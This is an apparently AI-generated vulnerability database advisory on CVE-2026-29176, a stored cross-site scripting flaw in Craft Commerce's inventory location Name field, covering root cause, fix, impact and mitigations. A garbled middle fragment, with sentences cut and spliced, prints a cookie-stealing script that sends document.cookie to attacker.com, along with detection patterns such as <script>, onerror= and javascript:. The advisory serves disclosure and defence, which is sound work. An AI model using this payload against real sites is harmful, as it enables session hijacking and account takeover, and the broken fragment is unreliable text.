
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-29176 is a stored Cross-Site Scripting (XSS) vulnerability in Craft Commerce, an ecommerce plugin for Craft CMS. The flaw exists in the Commerce Settings - Inventory Locations page, where the Name field is rendered without proper HTML escaping, allowing an authenticated attacker to inject and persist arbitrary JavaScript. The vulnerability affects Craft Commerce versions 5.0.0 through 5.5.2 (and reportedly 4.0.0 through 4.10.2 per ENISA data), and was disclosed on March 9, 2026. It carries a CVSS v3.1 base score of 4.8 (Medium) (GitHub Advisory).
The root cause is CWE-79 (Improper Neutralization of Input During Web Page Generation), specifically in src/fieldlayoutelements/PurchasableStockField.php, where the inventory location name was rendered directly via $inventoryLevel->getInventoryLocation()->name without HTML encoding. The fix replaced this with Html::encode($inventoryLevel->getInventoryLocation()->getUiLabel()), ensuring output is properly escaped (Fix Commit). Exploitation requires the attacker to have control panel access with permission to manage inventory locations; the payload is stored in the database and triggers when any administrator or user with product editing permissions views or creates a variant product, causing the injected JavaScript to execute in their browser (GitHub Advisory).
Successful exploitation allows an attacker to execute arbitrary JavaScript in the browsers of higher-privileged users, including administrators. Potential consequences include session hijacking, credential theft, account takeover (e.g., by forcing a password change), privilege escalation, creation of unauthorized admin accounts, and database exfiltration. Availability is not directly impacted, but the integrity and confidentiality of the Craft CMS administrative environment are at significant risk (GitHub Advisory).
No confirmed in-the-wild exploitation has been observed, and no weaponized exploit code is publicly available — the GitHub Advisory page referenced as a proof-of-concept contains only informational content (GitHub Advisory). The EPSS score is approximately 0.01% (1st percentile), indicating a very low probability of near-term exploitation. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation requires authenticated access with specific permissions (control panel access and the ability to manage inventory locations), which limits the attacker pool.
<script>document.location='https://attacker.com/steal?c='+document.cookie</script>).<script>, onerror=, javascript:) in the name parameter.<script>, <img src=x onerror=...>).Upgrade Craft Commerce to version 5.5.3 or later, which sanitizes the inventory location name field using Html::encode() before rendering in the Track Inventory table (Fix Commit). As interim mitigations, restrict the "Manage inventory locations" permission to only highly trusted users, and implement a strict Content Security Policy (CSP) header to limit the impact of any XSS execution. Regularly audit inventory location names for suspicious content as an additional detection measure (GitHub Advisory).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."